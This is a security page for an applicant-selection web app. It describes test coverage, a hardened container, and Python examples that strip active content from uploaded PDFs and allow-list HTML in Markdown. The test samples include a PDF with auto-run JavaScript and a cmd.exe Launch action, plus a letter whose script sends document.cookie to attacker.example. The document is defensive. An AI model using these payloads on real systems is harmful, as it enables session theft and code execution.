Note
Audience: Jury Managers, who may need to adapt the settings described here; everyone else, for information.
Security considerations and features
The application is tested with 100% test coverage, meaning that every statement of the application is executed by at least one test. Coverage measures which code runs under test, not that every possible scenario is exercised, so the role-based permissions and access controls, the key security feature, are tested on their own first, with 100% coverage required for that part, before the end-to-end scenarios are run.
The application's source code is hosted on GitLab, a software forge, and continuous integration runs the test suite on every commit. The tests act as a safeguard: a version that introduces a regression is not deployed, and a change that lowers test coverage is rejected on the master branch and on production instances.
The application runs in a "hardened" Docker container, that is, with several measures that limit what an attacker can do with a code-execution bug and keep the service stable. The source code is read-only inside the container, so it cannot be modified or tampered with at run time, and the process runs as a non-root user, which limits its access to system resources and prevents it from altering the system or the sources. As a consequence, the running application cannot be patched in place: a change must be committed to the source repository, where its author is recorded and where it is run through the full test suite before deployment.
These combined measures provide a secure and stable environment for our users.
Protection from attacks using PDF
A CV can be provided as a PDF file. The PDF format supports embedded JavaScript and other actions that a viewer executes automatically, and an attacker can use them against the application or its users, for example to steal session cookies or to extract application content. To prevent this, all executable content (JavaScript, launch actions and the like) is stripped from uploaded PDF files.
Uploading a CV as a PDF file can be disabled in https://ebaii-ngs-niveau1-internal.pasteur.cloud/setup/#candidate-settings. If you disable it, you may need to adapt the introduction text presented to applicants on how to apply, which is visible at https://ebaii-ngs-niveau1.pasteur.cloud/candidate/apply/Intro/. To do so, use the Language override module.
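The following is an added illustration of what "stripping executable content" from a PDF involves; it is not the application's own code, and the page does not say which tool the application uses. It walks the objects of an uncompressed PDF, removes the keys that fire actions automatically (/OpenAction, /AA), drops link actions whose type executes code (the JavaScript, Launch, SubmitForm, ImportData and Rendition types, a deny-list chosen for this example), blanks action objects themselves, and rewrites the cross-reference table. The sample PDF is constructed for the example. Real uploads are usually compressed into object streams, which this text-level walk does not look inside, so a production sanitizer should do the same job through a PDF library (pikepdf or qpdf, for instance); the function names here are the example's own.

```python
import re

DANGER_S = re.compile(r"/S\s*/(?:JavaScript|Launch|SubmitForm|ImportData|Rendition)\b")  # action types that run code
OBJ_RE = re.compile(r"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.S)
REF_RE = re.compile(r"\d+\s+\d+\s+R\b")
WS, DELIMS = set(" \t\r\n\x0c\x00"), set("()<>[]{}/%")

def skip_value(s, i):
    """Index just past the PDF value starting at s[i] (uncompressed syntax; malformed input raises, i.e. fails closed)."""
    while s[i] in WS:
        i += 1
    c = s[i]
    if c == "(":                                # literal string: nested parens, backslash escapes
        depth = 0
        while True:
            if s[i] == "\\":
                i += 2
                continue
            depth += {"(": 1, ")": -1}.get(s[i], 0)
            i += 1
            if depth == 0:
                return i
    if s.startswith("<<", i) or c == "[":       # dictionary or array: skip members one by one
        close, i = (">>", i + 2) if c == "<" else ("]", i + 1)
        while not s.startswith(close, i):
            i = i + 1 if s[i] in WS else skip_value(s, i)
        return i + len(close)
    if c == "<":                                # hex string
        return s.index(">", i) + 1
    if (m := REF_RE.match(s, i)):               # indirect reference "n g R"
        return m.end()
    j = i + 1 if c == "/" else i                # name, number, bool or null: one token
    while j < len(s) and s[j] not in WS and s[j] not in DELIMS:
        j += 1
    return max(j, i + 1)                        # always make progress on a stray delimiter

def remove_key(src, name, only_if=lambda value: True):
    """Delete every '/name value' pair from dictionary source text unless only_if(value) is False."""
    pat = re.compile(r"/%s(?=[\s/\[<(]|$)" % name)
    pos = 0
    while (m := pat.search(src, pos)):
        end = skip_value(src, m.end())
        if only_if(src[m.end():end]):
            src, pos = src[:m.start()] + src[end:], m.start()
        else:
            pos = end
    return src

def sanitize_object(body):
    for key in ("OpenAction", "AA"):            # actions fired on open and on page/field events
        body = remove_key(body, key)
    body = remove_key(body, "A", only_if=lambda v: DANGER_S.search(v) is not None)  # keep GoTo/URI links
    if DANGER_S.search(body):                   # the object is itself an action: neuter it
        return "<< >>"
    for key in ("JavaScript", "JS"):            # document-level script name tree entries
        body = remove_key(body, key)
    return body

def strip_active_content(pdf):
    """Return (sanitized PDF bytes, number of objects changed), with a rebuilt xref table."""
    text = pdf.decode("latin-1")                # lossless: one byte per character
    root = re.search(r"/Root\s+(\d+\s+\d+\s+R)", text).group(1)
    objects, changed = {}, 0
    for num, gen, body in OBJ_RE.findall(text):
        clean = sanitize_object(body)
        changed += clean != body
        objects[int(num)] = (gen, clean)
    out, offsets = "%PDF-1.4\n", {}
    for num in sorted(objects):
        offsets[num] = len(out)
        out += f"{num} {objects[num][0]} obj\n{objects[num][1]}\nendobj\n"
    size, xref_at = max(objects) + 1, len(out)  # assumes object numbers 1..n without gaps
    out += f"xref\n0 {size}\n0000000000 65535 f \n"
    out += "".join(f"{offsets[n]:010d} 00000 n \n" for n in range(1, size))
    out += f"trailer\n<< /Size {size} /Root {root} >>\nstartxref\n{xref_at}\n%%EOF\n"
    return out.encode("latin-1"), changed

def has_active_content(pdf):                    # cheap post-check on the sanitized bytes
    return re.search(rb"/(?:OpenAction|AA|JavaScript|JS|Launch|SubmitForm|ImportData)\b", pdf) is not None

# Constructed sample (not a real CV): JavaScript fired on document open (/OpenAction), on page open (/AA),
# registered in the /Names tree, plus a link whose action launches a program.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /Names << /JavaScript << /Names [(onload) 4 0 R] >> >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 595 842] /AA << /O 4 0 R >> /Annots [5 0 R] >>
endobj
4 0 obj
<< /S /JavaScript /JS (app.alert\\(document.URL\\)) >>
endobj
5 0 obj
<< /Type /Annot /Subtype /Link /Rect [10 10 100 30] /A << /S /Launch /F (cmd.exe) >> >>
endobj
trailer
<< /Root 1 0 R >>
"""
```

Calling `strip_active_content(SAMPLE_PDF)` changes four of the five objects: the catalog loses /OpenAction and the /JavaScript name tree, the page loses /AA, the JavaScript action object becomes an empty dictionary, and the link keeps its rectangle but loses its Launch action; `has_active_content` on the result returns False while the page and link objects are still there. Stripping is only one layer: serving uploaded files with an explicit `Content-Type` and `Content-Disposition: attachment`, so that a browser downloads rather than renders them inside the application's origin, is a common complement.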
Protection from attacks using Markdown
Markdown is used to format motivation letters, calls and more. Because Markdown renderers pass raw HTML through to the page, the format is a vector for JavaScript or CSS injection by attackers. A strict whitelist (allow-list) approach has been adopted: only a small set of HTML tags and attributes survives, and everything else is removed, which prevents almost all use of HTML within Markdown.
Markdown can be disabled for the entire application in https://ebaii-ngs-niveau1-internal.pasteur.cloud/setup/#mail-settings. If disabled, all content is HTML-escaped and line breaks are replaced by <br>.
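As an added example, not the application's own code, here is what the whitelist approach and the "Markdown disabled" fallback look like using only the Python standard library. The HTML produced by the Markdown renderer is re-serialised through an allow-list: unknown tags disappear (their text is kept, re-escaped), `<script>` and `<style>` disappear together with their content, every attribute that is not explicitly allowed is dropped, and `href` values are accepted only with a relative path or an http, https or mailto scheme. The tag and attribute lists, the function names and the hostile sample letter are assumptions made for this example, not the application's actual configuration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allow-list assumed for this example (not the application's real configuration): only these
# tags survive, and only with these attributes. Everything else, including every on* event
# handler, style attribute, <img>, <iframe> and <form>, is dropped.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "hr": set(), "blockquote": set(),
    "strong": set(), "em": set(), "b": set(), "i": set(), "code": set(), "pre": set(),
    "ul": set(), "ol": set(), "li": set(), "h1": set(), "h2": set(), "h3": set(),
    "a": {"href", "title"},
}
VOID_TAGS = {"br", "hr"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}  # their content is hostile too
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(value):
    """Return the URL if it is relative or uses an allowed scheme, else None.
    Whitespace and control characters are removed first: browsers ignore them inside
    the scheme, so a 'java\\nscript:' link would still execute."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    scheme = urlsplit(cleaned).scheme.lower()
    return cleaned if not scheme or scheme in SAFE_SCHEMES else None


class WhitelistSanitizer(HTMLParser):
    """Re-serialise HTML keeping only allow-listed tags and attributes; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._dropping = 0          # > 0 while inside <script>, <style>, ...

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._dropping += 1
            return
        if self._dropping or tag not in ALLOWED_TAGS:
            return                  # unknown tag vanishes, its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name == "href":
                value = safe_url(value)
                if value is None:
                    continue        # javascript:, data:, vbscript: ... links lose their href
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._dropping = max(0, self._dropping - 1)
        elif not self._dropping and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(html.escape(data, quote=False))

    # Comments, doctype declarations and processing instructions never reach the output.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass


def sanitize_rendered_markdown(rendered_html):
    """Markdown enabled: the renderer's HTML output is filtered through the allow-list."""
    parser = WhitelistSanitizer()
    parser.feed(rendered_html)
    parser.close()
    return "".join(parser.out)


def render_without_markdown(text):
    """Markdown disabled: everything is escaped, only line breaks become <br>."""
    return html.escape(text, quote=True).replace("\r\n", "\n").replace("\n", "<br>")


# Constructed sample: HTML a hostile applicant could smuggle into a motivation letter
# (Markdown renderers pass raw HTML through unchanged).
HOSTILE_LETTER = (
    '<p onclick="steal()">Dear jury, '
    '<a href=" java\nscript:alert(document.cookie)">my portfolio</a> '
    '<a href="https://example.org/cv">real link</a></p>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src=x onerror="alert(1)">'
    '<style>body{display:none}</style><b>kind regards</b>'
)

if __name__ == "__main__":
    print(sanitize_rendered_markdown(HOSTILE_LETTER))
    print(render_without_markdown("<b>not bold</b>\nsecond line"))
```

On the sample letter the sanitizer keeps `<p>`, both links and `<b>`, but the first link loses its `href` (the scheme is `javascript:` once the embedded newline is removed), the `onclick` and `onerror` handlers and the `<img>` vanish, and the `<script>` and `<style>` elements are dropped with their content. The second function is the behaviour described for the disabled mode: `html.escape` turns `<`, `>`, `&` and quotes into entities, so nothing the applicant types can become markup, and only newlines are turned into `<br>`.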